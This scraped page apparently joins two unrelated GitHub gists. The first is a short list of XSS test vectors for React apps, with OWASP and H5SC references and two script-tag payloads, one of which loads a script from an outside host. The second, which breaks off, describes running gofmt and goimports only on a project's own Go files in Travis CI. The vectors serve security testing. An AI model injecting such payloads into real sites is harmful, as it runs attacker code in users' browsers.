@scabbiaza
scabbiaza / List of vectors for checking on XSS
Last active December 29, 2023 07:44
ReactJS - prevent XSS vulnerability
// Theory
// http://htmlpurifier.org/live/smoketests/xssAttacks.php
// https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// A full collection of HTML5 related XSS attack vectors:
// https://github.com/cure53/H5SC https://raw.githubusercontent.com/cure53/H5SC/master/vectors.txt
// Short list
<script>alert("XSS: script tag")</script>
<script src="http://hackers-site.powertofly.com"></script>
@bgentry
bgentry / gist:fd1ffef7dbde01857f66
Last active March 25, 2020 17:56
Using gofmt or goimports on only my own Go files (excluding vendored deps)

In Travis CI, I want to check that my Go files are formatted properly via gofmt and goimports. During my CI builds, I only care about formatting issues in my own code, not in third-party repos.

Unfortunately, running a simple gofmt -l . in the root of my project does not work because I'm using Godep, which checks in all of my external dependencies at ./Godep/_workspace. While running go fmt ./... ignores underscore-prefixed subdirectories, the plain gofmt . does not. Neither gofmt nor goimports takes the ./... arg:

➜  goimports -l ./...      
stat ./...: no such file or directory

Since I can use go list ./... to get a list of all subpackages in my project (excluding vendored imports in an underscore-prefixed directory), I'm using the following to run gofmt and goimports on each of my own Go files (including _test.go files):